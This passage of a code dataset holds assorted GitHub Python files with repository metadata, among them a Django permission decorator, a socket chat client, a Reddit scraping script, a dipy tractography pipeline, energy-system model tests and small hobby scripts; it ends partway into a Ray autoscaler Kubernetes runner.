IME_METHOD(object):\n WDAIME = \"WDAIME\"\n\n\nROTATION_MODE = {\n 0: wda.PORTRAIT,\n 270: wda.LANDSCAPE,\n 90: wda.LANDSCAPE_RIGHT,\n 180: wda.PORTRAIT_UPSIDEDOWN,\n}\n\n\nKEY_EVENTS = {\n \"home\": \"home\",\n \"volumeup\": \"volumeUp\",\n \"volumedown\": \"volumeDown\"\n}\n","repo_name":"AirtestProject/Airtest","sub_path":"airtest/core/ios/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":7514,"dataset":"github-code","pt":"37"} +{"seq_id":"30909558803","text":"import functools\nfrom typing import Any, Callable, TypeVar\n\nfrom django.core.exceptions import PermissionDenied\nfrom django.utils.translation import gettext as _\n\nF = TypeVar(\"F\", bound=Callable[..., Any])\n\n\ndef permission_required(\n permissions: str | list[str] | set[str], *, all_required: bool = False\n) -> Callable[[Callable[..., Any]], Callable[..., Any]]:\n \"\"\"\n Decorator that can be used alongside any function to check if a user\n has a particular permission. Raises a PermissionDenied exception if user\n does not have the appropriate permission.\n \"\"\"\n\n def decorator(func: Any) -> Callable[..., Any]:\n @functools.wraps(func)\n def inner(*args: Any, **kwargs: Any) -> Any:\n *_arg, info = args\n\n try:\n user = info.auth\n\n if not user:\n raise PermissionDenied(_(\"User from context is unknown.\"))\n\n if not user.is_authenticated:\n raise PermissionDenied(_(\"User is unauthenticated.\"))\n\n if all_required:\n if not user.has_perms(permissions):\n raise PermissionDenied(\n _(\"You do not have all the required permissions.\")\n )\n elif isinstance(permissions, (list, set)):\n if not any(user.has_perm(perm) for perm in permissions):\n raise PermissionDenied(\n _(\"You do not have any of the required permissions.\")\n )\n else:\n if not user.has_perm(permissions):\n raise PermissionDenied(\n _(\"You do not have any of the required permissions.\")\n )\n\n return func(*args, **kwargs)\n except AttributeError as exc:\n raise AttributeError(\n \"Auth attribute on WSGIRequest does not exist. \"\n \"Ensure that authentication for the endpoint is enabled \"\n \"before using the permission_required decorator\"\n ) from exc\n\n return inner\n\n return decorator\n","repo_name":"danielkjellid/aria-api","sub_path":"aria/api_auth/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38768660107","text":"# -*- encoding: utf-8 -*-\n'''\n@File : cheat_Client.py\n@Time : 2020/05/04 10:43:43\n@Author : xdbcb8 \n@Version : 1.0\n@Contact : 838025538@qq.com\n'''\n\n# here put the import lib\n\nimport socket\nimport threading\nimport os\n\n\nclass Client:\n def __init__(self):\n # 创建套接字\n self.s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n # 连接\n\n self.addr = ('192.168.1.103', 9999)\n try:\n self.s.connect(self.addr)\n print('服务器已连接')\n except ConnectionRefusedError:\n print('服务器连接失败')\n os._exit(0)\n \n # 接收信息\n def recv(self):\n while True:\n try:\n response = self.s.recv(1024)\n print(':'+response.decode('utf-8'))\n except ConnectionResetError:\n print('服务器已关闭,聊天结束')\n self.s.close()\n break\n os._exit(0)\n\n def send(self):\n print('按回车发送消息')\n print('输入\\'esc\\'退出程序')\n while True:\n message = input()\n if message =='esc':\n print('聊天结束')\n self.s.close()\n break\n else:\n self.s.send(message.encode('utf-8'))\n\n os._exit(0)\n \n def start(self):\n threads = [threading.Thread(target=self.recv), threading.Thread(target=self.send)]\n for t in threads:\n t.start()\n\nif __name__ == \"__main__\":\n C = Client()\n C.start()\n","repo_name":"Liugenhao-gh/python_homework","sub_path":"homework9/4_cheat_Client.py","file_name":"4_cheat_Client.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22558435031","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('login/', views.login_user, name='login'),\n path('logout/', views.logout_user, name='logout'),\n path('reg_doc/', views.register_doc, name='reg_doc'),\n path('reg_patient/', views.register_patient, name='reg_patient'),\n path('reg_hospital/', views.register_hospital, name='reg_hospital'),\n path('error/', views.error, name='error'),\n\n\n\n]\n","repo_name":"Panks23/Patient-Doctor-Hospital-Management","sub_path":"project_dashboard/login_reg/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41608896675","text":"import pmaw\nimport os\nimport pandas as pd\nimport logging\nimport argparse as arg\nimport multiprocessing\nimport sys\nimport datetime\nimport csv\nfrom itertools import chain\n\nabspath = os.path.abspath(__file__)\ndname = os.path.dirname(abspath)\nos.chdir(dname)\nprocesses = 64\n\nparser = arg.ArgumentParser()\nparser.add_argument('subreddits', type=str, help='csv list of subreddits to pull')\nparser.add_argument('t', type=str, help='type information to pull, either subrmissions or comment')\n\nargs = parser.parse_args(sys.argv[1:])\n\n\nlogging.basicConfig(\n level=logging.INFO,\n filename=f'../../Files/logs/pull_subs{datetime.datetime.today()}.log',\n filemode='a',\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n datefmt='%d-%b-%y %H:%M:%S'\n)\n\ndef pullSubredditSubmissions(subreddit): # Pulls a subreddit from reddit and saves it to a file\n api = pmaw.PushshiftAPI(num_workers=15, jitter='full')\n start = int(datetime.datetime(2020, 3, 1).timestamp())\n end = int(datetime.datetime(2021, 2, 28).timestamp())\n results = api.search_submissions(\n subreddit=subreddit, \n after=start, \n before=end,\n mem_safe=True,\n filter = ('author', \n 'title',\n 'created_utc',\n 'selftext',\n 'url',\n 'id',\n 'score',\n 'num_comments',\n 'subreddit',\n 'permalink')\n )\n\n temp1 = pd.DataFrame([thing for thing in results])\n start = int(datetime.datetime(2021, 3, 1).timestamp())\n end = int(datetime.datetime(2022, 3, 31).timestamp())\n results = api.search_submissions(\n subreddit=subreddit, \n after=start, \n before=end,\n mem_safe=True,\n filter = ('author', \n 'title',\n 'created_utc',\n 'selftext',\n 'url',\n 'id',\n 'score',\n 'num_comments',\n 'subreddit',\n 'permalink')\n )\n temp2 = pd.DataFrame([thing for thing in results])\n temp = pd.concat([temp1, temp2])\n logging.info(f'Pulled subreddit {subreddit} number of posts: {len(temp)}')\n temp.to_pickle(f'../../Files/Submissions/{subreddit}.pickle')\n\ndef pullSubredditComments(subreddit): # Pulls the comments subreddit from reddit\n api = pmaw.PushshiftAPI(num_workers=15, rate_limit=100, jitter='full')\n start = int(datetime.datetime(2020, 3, 1).timestamp())\n end = int(datetime.datetime(2022, 3, 31).timestamp()) \n results = api.search_comments(\n subreddit=subreddit,\n after=start,\n before=end,\n mem_safe=True,\n filter = ('author',\n 'body',\n 'created_utc',\n 'id',\n 'score',\n 'permalink',\n 'subreddit',\n 'parent_id')\n ) \n\n temp = pd.DataFrame([thing for thing in results])\n logging.info(f'Pulled subreddit {subreddit} number of comments: {len(temp)}')\n temp.to_pickle(f'../../Files/Comments/{subreddit}.pickle')\n\ndef find_existing_pulls(type, subreddits): #remove existing pulls from subreddits list\n done = os.listdir(f'../../Files/{type}/')\n for i in done:\n done[done.index(i)] = i[:-7]\n res = [i for i in subreddits if i not in done]\n return res\n\n\ndef main(subreddits, type):\n if type == 'Submissions':\n subreddits = find_existing_pulls(type, subreddits)\n logging.info(f'start, pulling {type} for {len(subreddits)} subreddits')\n for subreddit in subreddits:\n pullSubredditSubmissions(subreddit)\n elif type == 'Comments':\n subreddits = find_existing_pulls(type, subreddits)\n logging.info(f'start, pulling {type} for {len(subreddits)} subreddits')\n for subreddit in subreddits:\n pullSubredditComments(subreddit)\n else:\n raise NameError('Please indicate of action to be done')\n quit()\n\n logging.info('finished')\n\n\nwith open(args.subreddits, newline='') as f:\n reader = csv.reader(f)\n subreddits = list(reader)\n\nsubreddits = list(chain.from_iterable(subreddits))\n\nif __name__ == '__main__':\n main(subreddits, args.t)","repo_name":"jvschlierf/networkthesis","sub_path":"Preprocessing/pull_subs_2.py","file_name":"pull_subs_2.py","file_ext":"py","file_size_in_byte":4130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"579305839","text":"#!/usr/bin/env python\n\nfrom argparse import ArgumentParser\n\nfrom dipy.tracking.streamline import Streamlines\nfrom dipy.core.gradients import gradient_table\nfrom dipy.reconst.shm import CsaOdfModel\nfrom dipy.reconst.csdeconv import (ConstrainedSphericalDeconvModel,\n auto_response)\nfrom dipy.tracking.local_tracking import LocalTracking\nfrom dipy.tracking.stopping_criterion import ThresholdStoppingCriterion\nfrom dipy.direction import ProbabilisticDirectionGetter, peaks_from_model\nfrom dipy.io.stateful_tractogram import Space, StatefulTractogram\nfrom dipy.io.streamline import save_trk, load_trk\nfrom dipy.io import read_bvals_bvecs\nfrom dipy.data import default_sphere\nfrom dipy.tracking import utils\nfrom dipy.viz import has_fury\nfrom nibabel.streamlines import ArraySequence\nfrom onevox.cli import driver as ov\n\n\nimport nibabel as nib\nimport numpy as np\nimport os.path as op\nimport os\nimport json\nimport matplotlib\nmatplotlib.use('AGG')\n\nimport matplotlib.pyplot as plt\n\n\ndef make_descriptor(parser, arguments=None):\n import boutiques.creator as bc\n\n basename = \"dipy_tracking\"\n desc = bc.CreateDescriptor(parser, execname=op.basename(basename),\n tags={\"domain\": [\"neuroinformatics\",\n \"image processing\",\n \"mri\", \"noise\"]})\n desc.save(basename + \".json\")\n\n if arguments is not None:\n invo = desc.createInvocation(arguments)\n invo.pop(\"boutiques\")\n\n with open(basename + \"_inputs.json\", \"w\") as fhandle:\n fhandle.write(json.dumps(invo, indent=4))\n\n\ndef wrap_fuzzy_failures(fn, args=[], kwargs={}, errortype=Exception,\n failure_threshold=9, verbose=False):\n failure_count = 0\n while True:\n try:\n result = fn(*args, **kwargs)\n break\n except errortype:\n failure_count += 1\n if verbose:\n print(\"Failure in {0} ({1} of {2})\".format(fn.__name__,\n failure_count,\n failure_threshold))\n if failure_count > failure_threshold:\n raise(FloatingPointError(\"Too many failures; stopping.\"))\n return result\n\n\ndef tracking(image, bvecs, bvals, wm, seeds, fibers, prune_length=3, rseed=42,\n plot=False, proba=False, verbose=False):\n # Pipelines transcribed from:\n # https://dipy.org/documentation/1.1.1./examples_built/tracking_introduction_eudx/#example-tracking-introduction-eudx\n # https://dipy.org/documentation/1.1.1./examples_built/tracking_probabilistic/\n\n # Load Images\n dwi_loaded = nib.load(image)\n dwi_data = dwi_loaded.get_fdata()\n\n wm_loaded = nib.load(wm)\n wm_data = wm_loaded.get_fdata()\n\n seeds_loaded = nib.load(seeds)\n seeds_data = seeds_loaded.get_fdata()\n seeds = utils.seeds_from_mask(seeds_data, dwi_loaded.affine, density=2)\n\n # Load B-values & B-vectors\n # NB. Use aligned b-vecs if providing eddy-aligned data\n bvals, bvecs = read_bvals_bvecs(bvals, bvecs)\n gtab = gradient_table(bvals, bvecs)\n csa_model = CsaOdfModel(gtab, sh_order=6)\n\n # Set stopping criterion\n gfa = csa_model.fit(dwi_data, mask=wm_data).gfa\n stop_criterion = ThresholdStoppingCriterion(gfa, .25)\n\n if proba:\n # Establish ODF model\n response, ratio = auto_response(gtab, dwi_data, roi_radius=10,\n fa_thr=0.7)\n csd_model = ConstrainedSphericalDeconvModel(gtab, response, sh_order=6)\n csd_fit = csd_model.fit(dwi_data, mask=wm_data)\n\n # Create Probabilisitic direction getter\n fod = csd_fit.odf(default_sphere)\n pmf = fod.clip(min=0)\n prob_dg = ProbabilisticDirectionGetter.from_pmf(pmf, max_angle=30.,\n sphere=default_sphere)\n # Use the probabilisitic direction getter as the dg\n dg = prob_dg\n\n else:\n # Establish ODF model\n csa_peaks = peaks_from_model(csa_model, dwi_data, default_sphere,\n relative_peak_threshold=0.8,\n min_separation_angle=45,\n mask=wm_data)\n\n # Use the CSA peaks as the dg\n dg = csa_peaks\n\n # Create generator and perform tracing\n s_generator = LocalTracking(dg, stop_criterion, seeds, dwi_loaded.affine,\n 0.5, random_seed=rseed)\n streamlines = Streamlines(s_generator)\n\n # Prune streamlines\n streamlines = ArraySequence([strline\n for strline in streamlines\n if len(strline) > prune_length])\n sft = StatefulTractogram(streamlines, dwi_loaded, Space.RASMM)\n\n # Save streamlines\n save_trk(sft, fibers + \".trk\")\n\n # Visualize fibers\n if plot and has_fury:\n from dipy.viz import window, actor, colormap as cmap\n\n # Create the 3D display.\n r = window.Renderer()\n r.add(actor.line(streamlines, cmap.line_colors(streamlines)))\n window.record(r,\n out_path=fibers + '.png',\n size=(800, 800))\n\n\ndef streamlines2graph(streamlines, affine, parcellation, output_file):\n # Load Images\n parcellation_loaded = nib.load(parcellation)\n parcellation_data = parcellation_loaded.get_fdata()\n\n uniq = np.unique(parcellation_data)\n parcellation_data = parcellation_data.astype(int)\n if list(uniq) != list(np.unique(parcellation_data)):\n raise TypeError(\"Parcellation labels should be integers.\")\n\n # Perform tracing\n graph, mapping = utils.connectivity_matrix(streamlines, affine,\n parcellation_data,\n symmetric=True,\n return_mapping=True)\n # Deleting edges with the background\n graph = np.delete(graph, (0), axis=0)\n graph = np.delete(graph, (0), axis=1)\n map_keys = sorted(mapping.keys())\n\n np.savetxt(output_file + \".mat\", graph)\n with open(output_file + \"_mapping.json\", \"w\") as fhandle:\n for k in map_keys:\n # ignore background fibers\n if 0 in k:\n continue\n v = mapping[k]\n fhandle.write(\"{0}\\t{1}\\t{2}\\n\".format(k[0], k[1],\n \",\".join([str(_)\n for _ in v])))\n\n plt.imshow(np.log1p(graph), interpolation='nearest')\n try:\n plt.savefig(output_file + \".png\")\n except ValueError:\n pass\n\n\ndef main(args=None):\n parser = ArgumentParser(\"dipy_tracking.py\",\n description=\"Generates streamlines and optionally \"\n \"a connectome from a set of diffusion \"\n \"volumes and parameter files.\")\n parser.add_argument(\"diffusion_image\",\n help=\"Image containing a stack of DWI volumes, ideally\"\n \" preprocessed, to be used for tracing. If this \"\n \"is a nifti image, the image is used directly. If\"\n \" it is a JSON file, it is expected to be an \"\n \"output from the 'oneVoxel' noise-simulation tool\"\n \" and the image will be regenerated using the \"\n \"parameters contained in the JSON file.\")\n parser.add_argument(\"bvecs\",\n help=\"The b-vectors corresponding to the diffusion \"\n \"images. If the images have been preprocessed \"\n \"then the rotated b-vectors should be used.\")\n parser.add_argument(\"bvals\",\n help=\"The b-values corresponding to the diffusion \"\n \"images. \")\n parser.add_argument(\"whitematter_mask\",\n help=\"A white matter mask generated from a structural \"\n \"image that has been transformed into the same \"\n \"space as the diffusion images.\")\n parser.add_argument(\"seed_mask\",\n help=\"A seed mask, recommended as the white matter and\"\n \" gray matter boundary. This can be derived from \"\n \"the white matter mask by dilating the image and \"\n \"subtracting the original mask.\")\n parser.add_argument(\"output_directory\",\n help=\"The directory in which the streamlines and \"\n \"optionally graphs and figures will be saved in.\")\n parser.add_argument(\"--labels\", \"-l\", nargs=\"+\",\n help=\"Optional nifti image containing co-registered \"\n \"region labels pertaining to a parcellation. This\"\n \" file will be used for generating a connectome \"\n \"from the streamlines.\")\n parser.add_argument(\"--verbose\", \"-v\", action=\"store_true\",\n help=\"Toggles verbose or quiet output printing.\")\n parser.add_argument(\"--prob\", \"-P\", action=\"store_true\",\n help=\"Toggles probabilistic tracking. Default: det.\")\n parser.add_argument(\"--prune\", \"-p\", action=\"store\", type=int, default=3,\n help=\"Dictates the minimum length of fibers to keep. \"\n \"If fibers are shorter than the value, exclusive,\"\n \"then they will be thrown out. Default value is \"\n \"3 nodes in the fiber.\")\n parser.add_argument(\"--random_seed\", \"-r\", action=\"store\", type=int,\n default=42,\n help=\"Random seed to be used in tractography.\")\n parser.add_argument(\"--streamline_plot\", \"-s\", action=\"store_true\",\n help=\"Toggles the plotting of streamlines. This \"\n \"requires VTK.\")\n parser.add_argument(\"--boutiques\", action=\"store_true\",\n help=\"Toggles creation of a Boutiques descriptor and \"\n \"invocation from the tool and inputs.\")\n\n results = parser.parse_args() if args is None else parser.parse_args(args)\n\n # Just create the descriptor and exit if we set this flag.\n if results.boutiques:\n make_descriptor(parser, results)\n return 0\n\n verbose = results.verbose\n image = results.diffusion_image\n bn = op.basename(image).split('.')[0]\n outdir = op.join(results.output_directory,\n bn.split(\"_\")[0],\n bn.split(\"_\")[1],\n \"dwi\")\n try:\n os.makedirs(outdir)\n except FileExistsError:\n pass\n\n noised = True if image.endswith(\".json\") else False\n if noised:\n noise_file = image\n # Load noise parameters\n with open(image, 'r') as fhandle:\n noise_data = json.loads(fhandle.read())\n\n # Apply noise to image\n in_image = noise_data[\"base_image\"]\n ov(in_image, outdir, apply_noise=noise_file, verbose=results.verbose)\n image = noise_file.replace('.json', '.nii.gz')\n\n rs = results.random_seed\n trackmod = \"prob\" if results.prob else \"det\"\n fibers = op.join(outdir, \"{0}_{1}_rs{2}\".format(bn, trackmod, rs))\n if not op.isfile(fibers + \".trk\"):\n wrap_fuzzy_failures(tracking,\n args=[image, results.bvecs, results.bvals,\n results.whitematter_mask, results.seed_mask,\n fibers],\n kwargs={\"plot\": results.streamline_plot,\n \"verbose\": verbose,\n \"rseed\": rs,\n \"proba\": results.prob},\n errortype=Exception,\n failure_threshold=5,\n verbose=verbose)\n\n tractog = load_trk(fibers + \".trk\", 'same', Space.RASMM)\n streamlines = tractog.streamlines\n\n if results.labels:\n graphs = []\n for label in results.labels:\n lbn = op.basename(label).split('.')[0].split(\"_\")[-1]\n graphs += [op.join(outdir, \"{0}_{1}_rs{2}_{3}\".format(bn, trackmod,\n rs, lbn))]\n streamlines2graph(streamlines, tractog.affine, label, graphs[-1])\n\n if noised:\n # Delete noisy image\n ov(image, outdir, clean=True, apply_noise=noise_file, verbose=verbose)\n\n if verbose:\n print(\"Streamlines: {0}\".format(fibers))\n print(\"Graphs: {0}\".format(\", \".join(graphs)))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gkiar/stability-impact","sub_path":"code/processing/tractography/dipy_tracking.py","file_name":"dipy_tracking.py","file_ext":"py","file_size_in_byte":13026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16727521092","text":"import time\nfrom typing import Union\n\nclass DiracDice:\n\n def __init__(self, p1_pos: int, p2_pos: int, p1_score: int, p2_score: int, max_score: int):\n self.p1_pos = p1_pos\n self.p2_pos = p2_pos\n self.p1_score = p1_score\n self.p2_score = p2_score\n self.max_score = max_score\n self.finished = False\n self.p1_wins = None\n\n def advance_p1(self, value: int):\n self.p1_pos += value\n if self.p1_pos > 10:\n self.p1_pos -= 10\n self.p1_score += self.p1_pos\n \n def advance_p2(self, value: int):\n self.p2_pos += value\n if self.p2_pos > 10:\n self.p2_pos -= 10\n self.p2_score += self.p2_pos\n\n def check(self):\n if self.p1_score >= self.max_score:\n self.finished = True\n self.p1_wins = True\n if self.p2_score >= self.max_score:\n self.finished = True\n self.p1_wins = False\n\ndef run_script(filepath: str) -> Union[int, str, float, bool]:\n with open(filepath, \"r\") as f:\n raw_data = f.read()\n return main_function(raw_data)\n\ndef main_function(raw_data: str) -> Union[int, str, float, bool]:\n start_time = time.time()\n \n result = your_script(raw_data)\n\n elapsed_time = time.time() - start_time\n print(f\"Time elapsed : {elapsed_time}s\")\n return result\n\ndef your_script(raw_data: str) -> Union[int, str, float, bool]:\n lines = raw_data.split(\"\\n\")\n p1_pos = int(lines[0][-2:])\n p2_pos = int(lines[1][-2:])\n print(f\"Part 1: {part_one(p1_pos, p2_pos)}\")\n\ndef part_one(p1_pos: int, p2_pos: int) -> int:\n dice = 1\n turn_count = 0\n game = DiracDice(p1_pos, p2_pos, 0, 0, 1000)\n while not game.finished:\n progress = (dice * 3 + 3) % 10\n if turn_count % 2 == 0:\n game.advance_p1(progress)\n else:\n game.advance_p2(progress)\n turn_count += 1\n dice += 3\n game.check()\n if dice >= 10:\n dice = dice - 10\n if game.p1_wins:\n return game.p2_score * turn_count * 3\n else:\n return game.p1_score * turn_count * 3\n\nif __name__ == \"__main__\":\n print(run_script(\"input.txt\"))","repo_name":"Regcent/AoC_2021","sub_path":"Day21/aoc_21.py","file_name":"aoc_21.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3997155275","text":"from django.contrib.auth.models import AbstractUser\nfrom django.db import models\n\n\nclass CustomUser(AbstractUser):\n role = models.CharField(max_length=16)\n\n\nclass TimeSlot(models.Model):\n user = models.ForeignKey(\"CustomUser\", blank=True, null=True, on_delete=models.CASCADE)\n start_time = models.DateTimeField()\n end_time = models.DateTimeField()\n\n def __str__(self):\n return f\"{self.user.username}: {self.start_time} --> {self.end_time}\"\n\n\n","repo_name":"saljoedassery/interview-scheduler","sub_path":"scheduler/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11127398488","text":"from src import ModuleManager, utils\n\nclass Module(ModuleManager.BaseModule):\n @utils.hook(\"received.command.which\")\n @utils.kwarg(\"min_args\", 1)\n @utils.kwarg(\"help\", \"Find where a command is provided\")\n @utils.kwarg(\"usage\", \"\")\n def which(self, event):\n command = event[\"args_split\"][0].lower()\n hooks = self.events.on(\"received.command\").on(command).get_hooks()\n if not hooks:\n raise utils.EventError(\"Unknown command '%s'\" % command)\n\n hook = hooks[0]\n module = self.bot.modules.from_context(hook.context)\n event[\"stdout\"].write(\"%s%s is provided by %s.%s\" % (\n event[\"command_prefix\"], command, module.name,\n hook.function.__name__))\n","repo_name":"chiefnoah/bitbot","sub_path":"modules/which.py","file_name":"which.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"29243727879","text":"import librosa\nimport soundfile as sf\n\n# 加载音频文件\naudio_path = r\"C:\\Users\\vivira\\OneDrive - mails.jlu.edu.cn\\文档\\Soulseek Downloads\\Soulseek Shared Folder\\少女前线交响音乐会\\东京公演\\Chapter 02.flac\"\ny, sr = sf.read(audio_path)\n\n\n# 根据平均响度调整音频的增益\ny = librosa.effects.normalize(y, rms=-20)\n\n# 保存调整后的音频文件为 FLAC 格式\noutput_path = r'your_output_audio_file_path.flac'\nsf.write(output_path, y, sr)\n","repo_name":"Crimone/flac-auto-renamer","sub_path":"均衡flac音量.py","file_name":"均衡flac音量.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"562794617","text":"import FINE as fn\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom pyomo.opt import SolverFactory\n\n\n@pytest.mark.skipif(\n not SolverFactory(\"gurobi\").available(),\n reason=\"QP solver required (check for license)\",\n)\ndef test_LPinvest(minimal_test_esM):\n \"\"\"\n Get the minimal test system, and check if invest of Electrolyzer without quadratic approach is unchanged.\n \"\"\"\n esM = minimal_test_esM\n\n esM.optimize(timeSeriesAggregation=False, solver=\"gurobi\")\n\n # get TAC of Electrolyzer\n\n invest = (\n esM.getOptimizationSummary(\"ConversionModel\")\n .loc[\"Electrolyzers\"]\n .loc[\"invest\"][\"ElectrolyzerLocation\"]\n .values.astype(int)[0]\n )\n\n assert invest == 8571428\n\n\n@pytest.mark.skipif(\n not SolverFactory(\"gurobi\").available(),\n reason=\"QP solver required (check for license\",\n)\ndef test_QPinvest():\n numberOfTimeSteps = 4\n hoursPerTimeStep = 2190\n\n # Create an energy system model instance\n esM = fn.EnergySystemModel(\n locations={\"location1\"},\n commodities={\"electricity\", \"hydrogen\"},\n numberOfTimeSteps=numberOfTimeSteps,\n commodityUnitsDict={\n \"electricity\": r\"kW$_{el}$\",\n \"hydrogen\": r\"kW$_{H_{2},LHV}$\",\n },\n hoursPerTimeStep=hoursPerTimeStep,\n costUnit=\"1 Euro\",\n lengthUnit=\"km\",\n verboseLogLevel=2,\n )\n\n # time step length [h]\n timeStepLength = numberOfTimeSteps * hoursPerTimeStep\n\n # Buy electricity at the electricity market\n costs = pd.Series([0.5, 0.4, 0.2, 0.5], index=[0, 1, 2, 3])\n esM.add(\n fn.Source(\n esM=esM,\n name=\"Electricity market\",\n commodity=\"electricity\",\n hasCapacityVariable=False,\n commodityCostTimeSeries=costs,\n )\n ) # euro/kWh\n\n # Electrolyzers\n esM.add(\n fn.Conversion(\n esM=esM,\n name=\"Electrolyzer\",\n physicalUnit=r\"kW$_{el}$\",\n commodityConversionFactors={\"electricity\": -1, \"hydrogen\": 0.7},\n hasCapacityVariable=True,\n investPerCapacity=500, # euro/kW\n opexPerCapacity=500 * 0.025,\n interestRate=0.08,\n economicLifetime=10,\n QPcostScale=0.1,\n capacityMin=0,\n capacityMax=10,\n )\n )\n\n # Industry site\n demand = pd.Series([10000.0, 10000.0, 10000.0, 10000.0], index=[0, 1, 2, 3])\n esM.add(\n fn.Sink(\n esM=esM,\n name=\"Industry site\",\n commodity=\"hydrogen\",\n hasCapacityVariable=False,\n operationRateFix=demand,\n )\n )\n\n # Optimize (just executed if gurobi is installed)\n esM.optimize(timeSeriesAggregation=False, solver=\"gurobi\")\n invest = round(\n esM.getOptimizationSummary(\"ConversionModel\")\n .loc[\"Electrolyzer\"]\n .loc[\"invest\"][\"location1\"]\n .values.astype(float)[0],\n 3,\n )\n assert invest == 3148.179\n\n # flag = True\n # try:\n # esM.optimize(timeSeriesAggregation=False, solver=\"gurobi\")\n # except:\n # flag = False\n\n # if flag:\n # invest = round(\n # esM.getOptimizationSummary(\"ConversionModel\")\n # .loc[\"Electrolyzer\"]\n # .loc[\"invest\"][\"location1\"]\n # .values.astype(float)[0],\n # 3,\n # )\n # assert invest == 3148.179\n","repo_name":"FZJ-IEK3-VSA/FINE","sub_path":"test/test_QPinvest.py","file_name":"test_QPinvest.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"37"} +{"seq_id":"27163349192","text":"from random import randint\n\n#Encoder Main\ndef mainEncoder(string=None):\n if string == None:\n string = input(\"Please enter your message: \")\n #Catch string from transformStr function\n scrambledStr = transformStr(string)\n makeSecret(scrambledStr)\n\n#Transform string\ndef transformStr(string):\n ordStr = \"\"\n #Convert letters to ASCE\n for i in string:\n ordStr += str(len(str(ord(i)))) + str(randint(10,99)) + str(ord(i)) + str(randint(10,99)) + \" \"\n return ordStr\n\n#Convert scrambled string to File\ndef makeSecret(scrambledStr):\n f = open('secret.txt','w')\n f.write(scrambledStr)\n f.close\n\nx=\"This is a sentence\"\nmainEncoder(x)\n","repo_name":"PDXDevCampJuly/daniel_pearl","sub_path":"python/EncodingAdv.py","file_name":"EncodingAdv.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11066911150","text":"import numpy as np\nimport matplotlib.pyplot as plt\ndata = np.loadtxt(\"jet_multiplicity_err\")\nexp_data = np.loadtxt(\"exp\")\ndef_data = np.loadtxt(\"MCplot\")\n\nplt.figure()\nx = [2, 3, 4, 5, 6]\nplt.errorbar(x, data.T[0], yerr=data.T[1], fmt='o', markersize=1, label='Pythia', capsize=2, elinewidth=0.5)\nplt.yscale(\"log\")\nplt.xlim = (1, 7)\nplt.errorbar(exp_data.T[1], exp_data.T[3], yerr=exp_data.T[4], fmt='o', markersize=1, label='ATLAS(2011)', capsize=2, elinewidth=0.5)\nplt.errorbar(def_data.T[1], def_data.T[3], yerr=def_data.T[4], fmt='o', markersize=1, label='default', capsize=2, elinewidth=0.5)\nplt.ylabel(\"$sigma$ [pb]\")\nplt.xlabel(\"$N_text{jet}$\")\nplt.legend()\nplt.title(\"Inclusive jet multiplicity ($R=0.4$)\")\nplt.savefig(\"JetMulti.pdf\")\nplt.show()\n\n","repo_name":"TianyuDai/pp_Cross_Section","sub_path":"Jet_Cross_Section/Result_multi/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24703796208","text":"from math import gcd\n\nT = int(input())\nresult = []\n\nfor i in range(T) :\n A, B = map(int, input().split())\n result.append(A*B//gcd(A, B))\n\nfor j in range(T) :\n print(result[j])","repo_name":"Sonjieun2/AlgorithmStudy","sub_path":"Baekjoon/2023_7/0707/1934.py","file_name":"1934.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35764067300","text":"try: # py3\n from shlex import quote\nexcept ImportError: # py2\n from pipes import quote\nimport click\nimport hashlib\nimport logging\nimport os\nimport subprocess\nimport sys\nimport time\n\nfrom threading import Thread\nfrom getpass import getuser\n\nfrom ray.autoscaler.tags import TAG_RAY_NODE_STATUS, TAG_RAY_RUNTIME_CONFIG, \\\n STATUS_UP_TO_DATE, STATUS_UPDATE_FAILED, STATUS_WAITING_FOR_SSH, \\\n STATUS_SETTING_UP, STATUS_SYNCING_FILES\nfrom ray.autoscaler.log_timer import LogTimer\n\nlogger = logging.getLogger(__name__)\n\n# How long to wait for a node to start, in seconds\nNODE_START_WAIT_S = 300\nREADY_CHECK_INTERVAL = 5\nHASH_MAX_LENGTH = 10\nKUBECTL_RSYNC = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \"kubernetes/kubectl-rsync.sh\")\n\n\ndef with_interactive(cmd):\n force_interactive = (\"true && source ~/.bashrc && \"\n \"export OMP_NUM_THREADS=1 PYTHONWARNINGS=ignore && \")\n return [\"bash\", \"--login\", \"-c\", \"-i\", quote(force_interactive + cmd)]\n\n\nclass KubernetesCommandRunner:\n def 